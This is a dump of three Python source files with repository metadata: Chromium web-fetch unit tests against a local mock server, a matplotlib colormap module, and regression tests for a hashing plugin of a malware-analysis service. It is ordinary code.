    def test_head_title_chromium_5(self):
        # Same as _1, but with an explicit title_timeout.
        pg_url = "http://localhost:{}/content/have-title".format(self.mock_server_port)
        retreived = self.wg.getHeadTitleChromium(pg_url, title_timeout=5)
        expect = {
            'url': pg_url,
            'title': 'I can haz title?',
        }
        self.assertEqual(retreived, expect)
class TestChromiumPooledGlobal(unittest.TestCase):
    """Chromium tests with two WebGetRobust instances sharing the default
    (global) tab pool.

    Fix: renamed from ``TestChromiumPooled``.  The module later defines a
    second class with that exact name (the ``use_global_tab_pool=False``
    variant), which shadowed this one, so none of these tests were ever
    collected or run by unittest.  Renaming makes both variants runnable;
    the later class keeps the old name, so existing references still work.
    """
    def setUp(self):
        # Two fetchers so the pooled-tab behaviour is exercised; the mock
        # server is bound to the first one.
        self.wg_1 = WebRequest.WebGetRobust()
        self.wg_2 = WebRequest.WebGetRobust()
        # Configure mock server.
        self.mock_server_port, self.mock_server, self.mock_server_thread = testing_server.start_server(self, self.wg_1, is_chromium=True)
    def tearDown(self):
        self.mock_server.shutdown()
        # Hacky force-close of the chromium interface
        self.wg_1.close_chromium()
        self.wg_2.close_chromium()
        del self.wg_1
        del self.wg_2
    def test_fetch_1(self):
        # Baseline: plain (non-chromium) fetch of the server root.
        page = self.wg_1.getpage("http://localhost:{}/".format(self.mock_server_port))
        self.assertEqual(page, 'Root OK?')
    def test_tab_repeatability_1(self):
        # Re-entering a chromium context for the same URL must land on the
        # same page every time.
        tgturl = "http://localhost:{}/".format(self.mock_server_port)
        page, fname, mtype = self.wg_1.getItemChromium(tgturl)
        self.assertEqual(fname, '')
        self.assertEqual(mtype, 'text/html')
        self.assertEqual(page, 'Root OK?')
        # print("Creating tab again!")
        with self.wg_1.chromiumContext(url=tgturl) as cr:
            at_url = cr.get_current_url()
            self.assertEqual(at_url, tgturl)
        # print("3rd tab context!")
        with self.wg_1.chromiumContext(url=tgturl) as cr:
            title, cur_url = cr.get_page_url_title()
            # print("title, cur_url", title, cur_url)
            self.assertEqual(cur_url, tgturl)
    def test_tab_flushing_1(self):
        # Opening many extra_tid tabs should flush the original tab out of
        # the pool, so a fresh default context no longer sits on tgturl.
        tgturl = "http://localhost:{}/".format(self.mock_server_port)
        page, fname, mtype = self.wg_1.getItemChromium(tgturl)
        self.assertEqual(fname, '')
        self.assertEqual(mtype, 'text/html')
        self.assertEqual(page, 'Root OK?')
        for x in range(20):
            # print("Creating tab again!")
            with self.wg_1.chromiumContext(url=tgturl, extra_tid=x) as cr:
                title, cur_url = cr.get_page_url_title()
                # print("title, cur_url", title, cur_url)
        # print("3rd tab context!")
        with self.wg_1.chromiumContext(url=tgturl) as cr:
            title, cur_url = cr.get_page_url_title()
            # print("title, cur_url", title, cur_url)
            self.assertNotEqual(cur_url, tgturl)
    def test_fetch_chromium_2(self):
        page, fname, mtype = self.wg_1.getItemChromium("http://localhost:{}/raw-txt".format(self.mock_server_port))
        self.assertEqual(fname, 'raw-txt')
        self.assertEqual(mtype, 'text/plain')
        self.assertEqual(page, 'Root OK?')
    def test_fetch_chromium_3(self):
        page, fname, mtype = self.wg_1.getItemChromium("http://localhost:{}/binary_ctnt".format(self.mock_server_port))
        self.assertEqual(fname, 'binary_ctnt')
        self.assertEqual(mtype, 'image/jpeg')
        self.assertEqual(page, b"Binary!\x00\x01\x02\x03")
    def test_fetch_chromium_4(self):
        page, fname, mtype = self.wg_1.chromiumGetRenderedItem("http://localhost:{}".format(self.mock_server_port))
        self.assertEqual(fname, '')
        self.assertEqual(mtype, 'text/html')
        self.assertEqual(page, '<html><head></head><body>Root OK?</body></html>') # Chrome adds a basic body here
    def test_fetch_chromium_5(self):
        page, fname, mtype = self.wg_1.chromiumGetRenderedItem("http://localhost:{}".format(self.mock_server_port), title_timeout=20)
        self.assertEqual(fname, '')
        self.assertEqual(mtype, 'text/html')
        self.assertEqual(page, '<html><head></head><body>Root OK?</body></html>') # Chrome adds a basic body here
    def test_head_chromium_1(self):
        url_1 = "http://localhost:{}/raw-txt".format(self.mock_server_port)
        purl_1 = self.wg_1.getHeadChromium(url_1)
        self.assertEqual(purl_1, url_1)
    def test_head_chromium_2(self):
        url_2 = "http://localhost:{}/redirect/to-1".format(self.mock_server_port)
        purl_2 = self.wg_1.getHeadChromium("http://localhost:{}/redirect/from-1".format(self.mock_server_port))
        self.assertEqual(purl_2, url_2)
    def test_head_chromium_3(self):
        url_3 = "http://localhost:{}/redirect/bad-1".format(self.mock_server_port)
        purl_3 = self.wg_1.getHeadChromium("http://localhost:{}/redirect/bad-1".format(self.mock_server_port))
        self.assertEqual(purl_3, url_3)
    def test_head_title_chromium_1(self):
        pg_url = "http://localhost:{}/content/have-title".format(self.mock_server_port)
        retrieved = self.wg_1.getHeadTitleChromium(pg_url)
        expect = {
            'url': pg_url,
            'title': 'I can haz title?',
        }
        self.assertEqual(retrieved, expect)
    def test_head_title_chromium_2(self):
        pg_url = "http://localhost:{}/".format(self.mock_server_port)
        retrieved = self.wg_1.getHeadTitleChromium(pg_url)
        expect = {
            # If no title is specified, chromium returns the server URL
            'url': pg_url,
            'title': 'localhost:{}'.format(self.mock_server_port),
        }
        self.assertEqual(retrieved, expect)
    def test_head_title_chromium_3(self):
        pg_url = "http://localhost:{}/binary_ctnt".format(self.mock_server_port)
        retrieved = self.wg_1.getHeadTitleChromium(pg_url)
        expect = {
            # If no title is specified, chromium returns the server URL
            'url': pg_url,
            'title': 'localhost:{}/binary_ctnt'.format(self.mock_server_port),
        }
        self.assertEqual(retrieved, expect)
    def test_head_title_chromium_4(self):
        pg_url = "http://localhost:{}/content/no-title".format(self.mock_server_port)
        retrieved = self.wg_1.getHeadTitleChromium(pg_url)
        expect = {
            'url': pg_url,
            'title': "localhost:{}/content/no-title".format(self.mock_server_port),
        }
        self.assertEqual(retrieved, expect)
    def test_head_title_chromium_5(self):
        pg_url = "http://localhost:{}/content/have-title".format(self.mock_server_port)
        retrieved = self.wg_1.getHeadTitleChromium(pg_url, title_timeout=5)
        expect = {
            'url': pg_url,
            'title': 'I can haz title?',
        }
        self.assertEqual(retrieved, expect)
class TestChromiumPooled(unittest.TestCase):
    """Chromium tests with two WebGetRobust instances that each get a
    private tab pool (``use_global_tab_pool=False``).

    NOTE(review): aside from the constructor flags, this class is nearly an
    exact copy of the preceding pooled test class -- consider factoring the
    shared test bodies into a mixin.
    """
    def setUp(self):
        # Two independent fetchers, each with its own tab pool; the mock
        # server is bound to the first one.
        self.wg_1 = WebRequest.WebGetRobust(use_global_tab_pool=False)
        self.wg_2 = WebRequest.WebGetRobust(use_global_tab_pool=False)
        # Configure mock server.
        self.mock_server_port, self.mock_server, self.mock_server_thread = testing_server.start_server(self, self.wg_1, is_chromium=True)
    def tearDown(self):
        self.mock_server.shutdown()
        # Hacky force-close of the chromium interface
        self.wg_1.close_chromium()
        self.wg_2.close_chromium()
        # self.wg.close_chromium()
        del self.wg_1
        del self.wg_2
    def test_fetch_1(self):
        # Baseline: plain (non-chromium) fetch of the server root.
        page = self.wg_1.getpage("http://localhost:{}/".format(self.mock_server_port))
        self.assertEqual(page, 'Root OK?')
    def test_tab_repeatability_1(self):
        # Re-entering a chromium context for the same URL must land on the
        # same page every time.
        tgturl = "http://localhost:{}/".format(self.mock_server_port)
        page, fname, mtype = self.wg_1.getItemChromium(tgturl)
        self.assertEqual(fname, '')
        self.assertEqual(mtype, 'text/html')
        self.assertEqual(page, 'Root OK?')
        # print("Creating tab again!")
        with self.wg_1.chromiumContext(url=tgturl) as cr:
            at_url = cr.get_current_url()
            self.assertEqual(at_url, tgturl)
        # print("3rd tab context!")
        with self.wg_1.chromiumContext(url=tgturl) as cr:
            title, cur_url = cr.get_page_url_title()
            # print("title, cur_url", title, cur_url)
            self.assertEqual(cur_url, tgturl)
    def test_tab_flushing_1(self):
        # Opening many extra_tid tabs should flush the original tab out of
        # the pool, so a fresh default context no longer sits on tgturl.
        tgturl = "http://localhost:{}/".format(self.mock_server_port)
        page, fname, mtype = self.wg_1.getItemChromium(tgturl)
        self.assertEqual(fname, '')
        self.assertEqual(mtype, 'text/html')
        self.assertEqual(page, 'Root OK?')
        for x in range(20):
            # print("Creating tab again!")
            with self.wg_1.chromiumContext(url=tgturl, extra_tid=x) as cr:
                title, cur_url = cr.get_page_url_title()
                # print("title, cur_url", title, cur_url)
        # print("3rd tab context!")
        with self.wg_1.chromiumContext(url=tgturl) as cr:
            title, cur_url = cr.get_page_url_title()
            # print("title, cur_url", title, cur_url)
            self.assertNotEqual(cur_url, tgturl)
    def test_fetch_chromium_2(self):
        page, fname, mtype = self.wg_1.getItemChromium("http://localhost:{}/raw-txt".format(self.mock_server_port))
        self.assertEqual(fname, 'raw-txt')
        self.assertEqual(mtype, 'text/plain')
        self.assertEqual(page, 'Root OK?')
    def test_fetch_chromium_3(self):
        page, fname, mtype = self.wg_1.getItemChromium("http://localhost:{}/binary_ctnt".format(self.mock_server_port))
        self.assertEqual(fname, 'binary_ctnt')
        self.assertEqual(mtype, 'image/jpeg')
        self.assertEqual(page, b"Binary!\x00\x01\x02\x03")
    def test_fetch_chromium_4(self):
        page, fname, mtype = self.wg_1.chromiumGetRenderedItem("http://localhost:{}".format(self.mock_server_port))
        self.assertEqual(fname, '')
        self.assertEqual(mtype, 'text/html')
        self.assertEqual(page, '<html><head></head><body>Root OK?</body></html>') # Chrome adds a basic body here
    def test_fetch_chromium_5(self):
        page, fname, mtype = self.wg_1.chromiumGetRenderedItem("http://localhost:{}".format(self.mock_server_port), title_timeout=20)
        self.assertEqual(fname, '')
        self.assertEqual(mtype, 'text/html')
        self.assertEqual(page, '<html><head></head><body>Root OK?</body></html>') # Chrome adds a basic body here
    def test_head_chromium_1(self):
        # HEAD of a non-redirecting URL resolves to the URL itself.
        url_1 = "http://localhost:{}/raw-txt".format(self.mock_server_port)
        purl_1 = self.wg_1.getHeadChromium(url_1)
        self.assertEqual(purl_1, url_1)
    def test_head_chromium_2(self):
        # HEAD follows the redirect and reports the destination URL.
        url_2 = "http://localhost:{}/redirect/to-1".format(self.mock_server_port)
        purl_2 = self.wg_1.getHeadChromium("http://localhost:{}/redirect/from-1".format(self.mock_server_port))
        self.assertEqual(purl_2, url_2)
    def test_head_chromium_3(self):
        # A bad redirect resolves back to the requested URL.
        url_3 = "http://localhost:{}/redirect/bad-1".format(self.mock_server_port)
        purl_3 = self.wg_1.getHeadChromium("http://localhost:{}/redirect/bad-1".format(self.mock_server_port))
        self.assertEqual(purl_3, url_3)
    def test_head_title_chromium_1(self):
        pg_url = "http://localhost:{}/content/have-title".format(self.mock_server_port)
        retreived = self.wg_1.getHeadTitleChromium(pg_url)
        expect = {
            'url': pg_url,
            'title': 'I can haz title?',
        }
        self.assertEqual(retreived, expect)
    def test_head_title_chromium_2(self):
        pg_url = "http://localhost:{}/".format(self.mock_server_port)
        retreived = self.wg_1.getHeadTitleChromium(pg_url)
        expect = {
            # If no title is specified, chromium returns the server URL
            'url': pg_url,
            'title': 'localhost:{}'.format(self.mock_server_port),
        }
        self.assertEqual(retreived, expect)
    def test_head_title_chromium_3(self):
        pg_url = "http://localhost:{}/binary_ctnt".format(self.mock_server_port)
        retreived = self.wg_1.getHeadTitleChromium(pg_url)
        expect = {
            # If no title is specified, chromium returns the server URL
            'url': pg_url,
            'title': 'localhost:{}/binary_ctnt'.format(self.mock_server_port),
        }
        self.assertEqual(retreived, expect)
    def test_head_title_chromium_4(self):
        pg_url = "http://localhost:{}/content/no-title".format(self.mock_server_port)
        retreived = self.wg_1.getHeadTitleChromium(pg_url)
        expect = {
            'url': pg_url,
            'title': "localhost:{}/content/no-title".format(self.mock_server_port),
        }
        self.assertEqual(retreived, expect)
    def test_head_title_chromium_5(self):
        pg_url = "http://localhost:{}/content/have-title".format(self.mock_server_port)
        retreived = self.wg_1.getHeadTitleChromium(pg_url, title_timeout=5)
        expect = {
            'url': pg_url,
            'title': 'I can haz title?',
        }
        self.assertEqual(retreived, expect)
| 35.660592
| 131
| 0.727435
| 2,248
| 15,655
| 4.840747
| 0.058719
| 0.113031
| 0.091344
| 0.102555
| 0.978588
| 0.977302
| 0.977302
| 0.965723
| 0.963242
| 0.958464
| 0
| 0.013911
| 0.122964
| 15,655
| 438
| 132
| 35.742009
| 0.77866
| 0.07908
| 0
| 0.855799
| 0
| 0
| 0.172924
| 0.027952
| 0
| 0
| 0
| 0
| 0.263323
| 1
| 0.15674
| false
| 0
| 0.037618
| 0
| 0.203762
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ad98687fa440eea01888668e1af0dd4880635fc9
| 8,329
|
py
|
Python
|
NeBSS/struct/colormaps.py
|
PIRCImagingTools/NeBSS
|
509b3fdbe08d53ea44da1db5f865ba8e3a534164
|
[
"BSD-3-Clause"
] | 2
|
2019-05-23T07:11:04.000Z
|
2019-05-24T14:18:21.000Z
|
NeBSS/struct/colormaps.py
|
PIRCImagingTools/NeBSS
|
509b3fdbe08d53ea44da1db5f865ba8e3a534164
|
[
"BSD-3-Clause"
] | 2
|
2018-04-11T12:36:31.000Z
|
2019-02-15T00:21:17.000Z
|
NeBSS/struct/colormaps.py
|
PIRCImagingTools/NeBSS
|
509b3fdbe08d53ea44da1db5f865ba8e3a534164
|
[
"BSD-3-Clause"
] | 3
|
2017-07-21T18:05:41.000Z
|
2019-01-23T09:32:10.000Z
|
from matplotlib.colors import LinearSegmentedColormap
from matplotlib.colors import ListedColormap
def blue():
    """Linear colormap ramping the blue channel from 0.3 up to 1.0
    (red and green stay at zero)."""
    segments = {
        'red':   [(0.0, 0.0, 0.0), (1.0, 0.0, 0.0)],
        'green': [(0.0, 0.0, 0.0), (1.0, 0.0, 0.0)],
        'blue':  [(0.0, 0.0, 0.3), (1.0, 1.0, 1.0)],
    }
    return LinearSegmentedColormap('Blue', segments)
def blue_r():
    """Reversed counterpart of blue(): blue channel ramps from 1.0 down
    to 0.3 (red and green stay at zero)."""
    segments = {
        'red':   [(0.0, 0.0, 0.0), (1.0, 0.0, 0.0)],
        'green': [(0.0, 0.0, 0.0), (1.0, 0.0, 0.0)],
        'blue':  [(0.0, 0.0, 1.0), (1.0, 0.3, 1.0)],
    }
    return LinearSegmentedColormap('Blue_r', segments)
def darkgreen():
    """Linear colormap ramping the green channel from 0.2 up to 0.5.

    Fix: the colormap was registered under the name 'Green', which collided
    with the (different) map returned by green(); it is now 'DarkGreen'.
    """
    cdict = {'red': ((0.0, 0.0, 0.0),
                     (1.0, 0.0, 0.0)),
             'green': ((0.0, 0.0, 0.2),
                       (1.0, 0.5, 0.0)),
             'blue': ((0.0, 0.0, 0.0),
                      (1.0, 0.0, 0.0))
             }
    return LinearSegmentedColormap('DarkGreen', cdict)
def darkgreen_r():
    """Reversed counterpart of darkgreen(): green channel ramps from 0.5
    down to 0.2.

    Fix: the colormap was registered under the name 'Green_r', which
    collided with the map returned by green_r(); it is now 'DarkGreen_r'.
    """
    cdict = {'red': ((0.0, 0.0, 0.0),
                     (1.0, 0.0, 0.0)),
             'green': ((0.0, 0.0, 0.5),
                       (1.0, 0.2, 0.0)),
             'blue': ((0.0, 0.0, 0.0),
                      (1.0, 0.0, 0.0))
             }
    return LinearSegmentedColormap('DarkGreen_r', cdict)
def green():
    """Linear colormap ramping the green channel from 0.3 up to 1.0
    (red and blue stay at zero)."""
    segments = {
        'red':   [(0.0, 0.0, 0.0), (1.0, 0.0, 0.0)],
        'green': [(0.0, 0.0, 0.3), (1.0, 1.0, 1.0)],
        'blue':  [(0.0, 0.0, 0.0), (1.0, 0.0, 0.0)],
    }
    return LinearSegmentedColormap('Green', segments)
def green_r():
    """Reversed counterpart of green(): green channel ramps from 1.0 down
    to 0.3 (red and blue stay at zero)."""
    segments = {
        'red':   [(0.0, 0.0, 0.0), (1.0, 0.0, 0.0)],
        'green': [(0.0, 0.0, 1.0), (1.0, 0.3, 1.0)],
        'blue':  [(0.0, 0.0, 0.0), (1.0, 0.0, 0.0)],
    }
    return LinearSegmentedColormap('Green_r', segments)
def lightblue():
    """Linear colormap ramping green (0.2 -> 0.9) and blue (0.3 -> 1.0).

    Fix: the colormap was registered under the name 'Green', which collided
    with the map returned by green(); it is now 'LightBlue'.
    """
    cdict = {'red': ((0.0, 0.0, 0.0),
                     (1.0, 0.0, 0.0)),
             'green': ((0.0, 0.0, 0.2),
                       (1.0, 0.9, 1.0)),
             'blue': ((0.0, 0.0, 0.3),
                      (1.0, 1.0, 0.0))
             }
    return LinearSegmentedColormap('LightBlue', cdict)
def lightblue_r():
    """Reversed counterpart of lightblue(): green 0.9 -> 0.2, blue 1.0 -> 0.3.

    Fix: the colormap was registered under the name 'Green_r', which
    collided with the map returned by green_r(); it is now 'LightBlue_r'.
    """
    cdict = {'red': ((0.0, 0.0, 0.0),
                     (1.0, 0.0, 0.0)),
             'green': ((0.0, 0.0, 0.9),
                       (1.0, 0.2, 1.0)),
             'blue': ((0.0, 0.0, 1.0),
                      (1.0, 0.3, 0.0))
             }
    return LinearSegmentedColormap('LightBlue_r', cdict)
def orange():
    """Linear colormap ramping red (0.3 -> 1.0) and green (0.2 -> 0.5).

    Fix: the colormap was registered under the name 'Green', which collided
    with the map returned by green(); it is now 'Orange'.
    """
    cdict = {'red': ((0.0, 0.0, 0.3),
                     (1.0, 1.0, 0.0)),
             'green': ((0.0, 0.0, 0.2),
                       (1.0, 0.5, 0.0)),
             'blue': ((0.0, 0.0, 0.0),
                      (1.0, 0.0, 0.0))
             }
    return LinearSegmentedColormap('Orange', cdict)
def orange_r():
    """Reversed counterpart of orange(): red 1.0 -> 0.3, green 0.5 -> 0.2.

    Fix: the colormap was registered under the name 'Green_r', which
    collided with the map returned by green_r(); it is now 'Orange_r'.
    """
    cdict = {'red': ((0.0, 0.0, 1.0),
                     (1.0, 0.3, 0.0)),
             'green': ((0.0, 0.0, 0.5),
                       (1.0, 0.2, 0.0)),
             'blue': ((0.0, 0.0, 0.0),
                      (1.0, 0.0, 0.0))
             }
    return LinearSegmentedColormap('Orange_r', cdict)
def purple():
    """Linear colormap ramping red and blue together (0.3 -> 1.0).

    Fix: the colormap was registered under the name 'Green', which collided
    with the map returned by green(); it is now 'Purple'.
    """
    cdict = {'red': ((0.0, 0.0, 0.3),
                     (1.0, 1.0, 0.0)),
             'green': ((0.0, 0.0, 0.0),
                       (1.0, 0.0, 1.0)),
             'blue': ((0.0, 0.0, 0.3),
                      (1.0, 1.0, 0.0))
             }
    return LinearSegmentedColormap('Purple', cdict)
def purple_r():
    """Reversed counterpart of purple(): red and blue ramp 1.0 -> 0.3.

    Fix: the colormap was registered under the name 'Green_r', which
    collided with the map returned by green_r(); it is now 'Purple_r'.
    """
    cdict = {'red': ((0.0, 0.0, 1.0),
                     (1.0, 0.3, 0.0)),
             'green': ((0.0, 0.0, 0.0),
                       (1.0, 0.0, 0.0)),
             'blue': ((0.0, 0.0, 1.0),
                      (1.0, 0.3, 0.0))
             }
    return LinearSegmentedColormap('Purple_r', cdict)
def red():
    """Linear colormap ramping the red channel from 0.3 up to 1.0
    (green and blue stay at zero)."""
    segments = {
        'red':   [(0.0, 0.0, 0.3), (1.0, 1.0, 1.0)],
        'green': [(0.0, 0.0, 0.0), (1.0, 0.0, 0.0)],
        'blue':  [(0.0, 0.0, 0.0), (1.0, 0.0, 0.0)],
    }
    return LinearSegmentedColormap('Red', segments)
def red_r():
    """Reversed red colormap (red ramps 1.0 -> 0.3; green/blue stay 0)."""
    segments = {
        'red':   ((0.0, 0.0, 1.0), (1.0, 0.3, 1.0)),
        'green': ((0.0, 0.0, 0.0), (1.0, 0.0, 0.0)),
        'blue':  ((0.0, 0.0, 0.0), (1.0, 0.0, 0.0)),
    }
    return LinearSegmentedColormap('Red_r', segments)
def yellow():
    """Yellow colormap (red and green both ramp 0.3 -> 1.0; blue stays 0)."""
    cdict = {
        'red':   ((0.0, 0.0, 0.3), (1.0, 1.0, 0.0)),
        'green': ((0.0, 0.0, 0.3), (1.0, 1.0, 0.0)),
        'blue':  ((0.0, 0.0, 0.0), (1.0, 0.0, 0.0)),
    }
    # Bug fix: this colormap was mislabelled 'yellow_green' (copy-paste).
    return LinearSegmentedColormap('yellow', cdict)
def yellow_r():
    """Reversed yellow colormap (red and green both ramp 1.0 -> 0.3)."""
    cdict = {
        'red':   ((0.0, 0.0, 1.0), (1.0, 0.3, 0.0)),
        'green': ((0.0, 0.0, 1.0), (1.0, 0.3, 0.0)),
        'blue':  ((0.0, 0.0, 0.0), (1.0, 0.0, 0.0)),
    }
    # Bug fix: this colormap was mislabelled 'yellow_green_r' (copy-paste).
    return LinearSegmentedColormap('yellow_r', cdict)
def yellow_green():
    """Yellow-green colormap (red ramps 0.0 -> 0.9, green 0.4 -> 0.8)."""
    segments = {
        'red':   ((0.0, 0.0, 0.0), (1.0, 0.9, 0.0)),
        'green': ((0.0, 0.0, 0.4), (1.0, 0.8, 0.0)),
        'blue':  ((0.0, 0.0, 0.0), (1.0, 0.0, 0.0)),
    }
    return LinearSegmentedColormap('yellow_green', segments)
def yellow_green_r():
    """Reversed yellow-green colormap (red ramps 0.9 -> 0.0, green 0.8 -> 0.4)."""
    segments = {
        'red':   ((0.0, 0.0, 0.9), (1.0, 0.0, 0.0)),
        'green': ((0.0, 0.0, 0.8), (1.0, 0.4, 0.0)),
        'blue':  ((0.0, 0.0, 0.0), (1.0, 0.0, 0.0)),
    }
    return LinearSegmentedColormap('yellow_green_r', segments)
################################################
### SEGMENTATION COLORS
################################################
def brainstem():
    """Segmentation colormap for the brainstem: magenta (red and blue ramp 0.3 -> 0.9)."""
    segments = {
        'red':   ((0.0, 0.0, 0.3), (1.0, 0.9, 0.0)),
        'green': ((0.0, 0.0, 0.0), (1.0, 0.0, 0.0)),
        'blue':  ((0.0, 0.0, 0.3), (1.0, 0.9, 0.0)),
    }
    return LinearSegmentedColormap('brainstem', segments)
def cerebellum():
    """Segmentation colormap for the cerebellum: cyan (green and blue ramp 0.3 -> 0.9)."""
    segments = {
        'red':   ((0.0, 0.0, 0.0), (1.0, 0.0, 0.0)),
        'green': ((0.0, 0.0, 0.3), (1.0, 0.9, 0.0)),
        'blue':  ((0.0, 0.0, 0.3), (1.0, 0.9, 0.0)),
    }
    return LinearSegmentedColormap('cerebellum', segments)
def cortex():
    """Segmentation colormap for cortex: green channel ramps 0.3 -> 0.9."""
    segments = {
        'red':   ((0.0, 0.0, 0.0), (1.0, 0.0, 0.0)),
        'green': ((0.0, 0.0, 0.3), (1.0, 0.9, 0.0)),
        'blue':  ((0.0, 0.0, 0.0), (1.0, 0.0, 0.0)),
    }
    return LinearSegmentedColormap('cortex', segments)
def csf():
    """Segmentation colormap for CSF: yellow (red and green ramp 0.3 -> 0.9)."""
    segments = {
        'red':   ((0.0, 0.0, 0.3), (1.0, 0.9, 0.0)),
        'green': ((0.0, 0.0, 0.3), (1.0, 0.9, 0.0)),
        'blue':  ((0.0, 0.0, 0.0), (1.0, 0.0, 0.0)),
    }
    return LinearSegmentedColormap('csf', segments)
def dgm():
    """Segmentation colormap for deep grey matter: red channel ramps 0.3 -> 0.9."""
    cdict = {
        'red':   ((0.0, 0.0, 0.3), (1.0, 0.9, 0.0)),
        'green': ((0.0, 0.0, 0.0), (1.0, 0.0, 0.0)),
        'blue':  ((0.0, 0.0, 0.0), (1.0, 0.0, 0.0)),
    }
    # Bug fix: this colormap was mislabelled 'csf' (copy-paste from csf()).
    return LinearSegmentedColormap('dgm', cdict)
def wm():
    """Segmentation colormap for white matter: blue channel ramps 0.3 -> 0.9."""
    segments = {
        'red':   ((0.0, 0.0, 0.0), (1.0, 0.0, 0.0)),
        'green': ((0.0, 0.0, 0.0), (1.0, 0.0, 0.0)),
        'blue':  ((0.0, 0.0, 0.3), (1.0, 0.9, 0.0)),
    }
    return LinearSegmentedColormap('wm', segments)
##########################
def custom_discrete(name, colors):
    """Return a discrete ListedColormap built from ``colors``, labelled ``name``."""
    return ListedColormap(colors, name)
if __name__ == '__main__':
    # Demo: render the green_r colormap as a horizontal colorbar.
    # Bug fix: ``from matplotlib import mpl`` was removed from matplotlib
    # (deprecated in 1.0, gone since 1.3); import the colorbar module directly.
    from matplotlib import pyplot
    from matplotlib import colorbar
    fig = pyplot.figure(figsize=(8, 3))
    ax1 = fig.add_axes([0.05, 0.8, 0.9, 0.15])
    cb1 = colorbar.ColorbarBase(ax1, cmap=green_r(),
                                orientation='horizontal')
    pyplot.show()
| 27.949664
| 61
| 0.339176
| 1,187
| 8,329
| 2.350463
| 0.046335
| 0.371326
| 0.38172
| 0.34552
| 0.803584
| 0.779211
| 0.779211
| 0.778853
| 0.778853
| 0.768459
| 0
| 0.184897
| 0.429223
| 8,329
| 297
| 62
| 28.043771
| 0.401977
| 0.002281
| 0
| 0.656388
| 0
| 0
| 0.057307
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.110132
| false
| 0
| 0.013216
| 0.004405
| 0.23348
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
ad9d999cd314bd0f8f5ebaed93a9f9ed58284e3e
| 2,949
|
py
|
Python
|
t.scales/test_hashes.py
|
countercept/snake-charmer
|
c37da399c6123549f1880c4487038a2281a487e1
|
[
"BSD-3-Clause"
] | null | null | null |
t.scales/test_hashes.py
|
countercept/snake-charmer
|
c37da399c6123549f1880c4487038a2281a487e1
|
[
"BSD-3-Clause"
] | null | null | null |
t.scales/test_hashes.py
|
countercept/snake-charmer
|
c37da399c6123549f1880c4487038a2281a487e1
|
[
"BSD-3-Clause"
] | 1
|
2018-09-04T09:41:29.000Z
|
2018-09-04T09:41:29.000Z
|
import json
import requests
def test_hashes_scale(regtest, db, url):
    """Regression-test the JSON payload returned by GET /scale/hashes."""
    response = requests.get(url + '/scale/hashes')
    scale = response.json()['data']['scale']
    regtest.write(str(json.dumps(scale, sort_keys=True)))
def test_hashes_md5_file(regtest, db, url, file):
    """Run the hashes scale's md5_digest command on a file sample."""
    payload = {
        "sha256_digest": file['sha256_digest'],
        "scale": "hashes",
        "command": "md5_digest",
    }
    response = requests.post(url + '/command', json=payload)
    cmd = response.json()
    # Blank out volatile timing fields so the regression output stays stable.
    for field in ('timestamp', 'start_time', 'end_time'):
        cmd['data']['command'][field] = None
    regtest.write(str(json.dumps(cmd, sort_keys=True)))
def test_hashes_sha1_file(regtest, db, url, file):
    """Run the hashes scale's sha1_digest command on a file sample."""
    payload = {
        "sha256_digest": file['sha256_digest'],
        "scale": "hashes",
        "command": "sha1_digest",
    }
    response = requests.post(url + '/command', json=payload)
    cmd = response.json()
    # Blank out volatile timing fields so the regression output stays stable.
    for field in ('timestamp', 'start_time', 'end_time'):
        cmd['data']['command'][field] = None
    regtest.write(str(json.dumps(cmd, sort_keys=True)))
def test_hashes_sha512_file(regtest, db, url, file):
    """Run the hashes scale's sha512_digest command on a file sample."""
    payload = {
        "sha256_digest": file['sha256_digest'],
        "scale": "hashes",
        "command": "sha512_digest",
    }
    response = requests.post(url + '/command', json=payload)
    cmd = response.json()
    # Blank out volatile timing fields so the regression output stays stable.
    for field in ('timestamp', 'start_time', 'end_time'):
        cmd['data']['command'][field] = None
    regtest.write(str(json.dumps(cmd, sort_keys=True)))
def test_hashes_md5_mem(regtest, db, url, memory):
    """Run the hashes scale's md5_digest command on a memory sample."""
    payload = {
        "sha256_digest": memory['sha256_digest'],
        "scale": "hashes",
        "command": "md5_digest",
    }
    response = requests.post(url + '/command', json=payload)
    cmd = response.json()
    # Blank out volatile timing fields so the regression output stays stable.
    for field in ('timestamp', 'start_time', 'end_time'):
        cmd['data']['command'][field] = None
    regtest.write(str(json.dumps(cmd, sort_keys=True)))
def test_hashes_sha1_mem(regtest, db, url, memory):
    """Run the hashes scale's sha1_digest command on a memory sample."""
    payload = {
        "sha256_digest": memory['sha256_digest'],
        "scale": "hashes",
        "command": "sha1_digest",
    }
    response = requests.post(url + '/command', json=payload)
    cmd = response.json()
    # Blank out volatile timing fields so the regression output stays stable.
    for field in ('timestamp', 'start_time', 'end_time'):
        cmd['data']['command'][field] = None
    regtest.write(str(json.dumps(cmd, sort_keys=True)))
def test_hashes_sha512_mem(regtest, db, url, memory):
    """Run the hashes scale's sha512_digest command on a memory sample."""
    payload = {
        "sha256_digest": memory['sha256_digest'],
        "scale": "hashes",
        "command": "sha512_digest",
    }
    response = requests.post(url + '/command', json=payload)
    cmd = response.json()
    # Blank out volatile timing fields so the regression output stays stable.
    for field in ('timestamp', 'start_time', 'end_time'):
        cmd['data']['command'][field] = None
    regtest.write(str(json.dumps(cmd, sort_keys=True)))
# TODO: Test all
# TODO: Fuzzy should be removed
| 30.402062
| 55
| 0.597152
| 375
| 2,949
| 4.544
| 0.112
| 0.073944
| 0.147887
| 0.126761
| 0.923122
| 0.909038
| 0.909038
| 0.890845
| 0.890845
| 0.890845
| 0
| 0.02386
| 0.204137
| 2,949
| 96
| 56
| 30.71875
| 0.702173
| 0.01492
| 0
| 0.769231
| 0
| 0
| 0.262578
| 0
| 0
| 0
| 0
| 0.010417
| 0
| 1
| 0.089744
| false
| 0
| 0.025641
| 0
| 0.115385
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
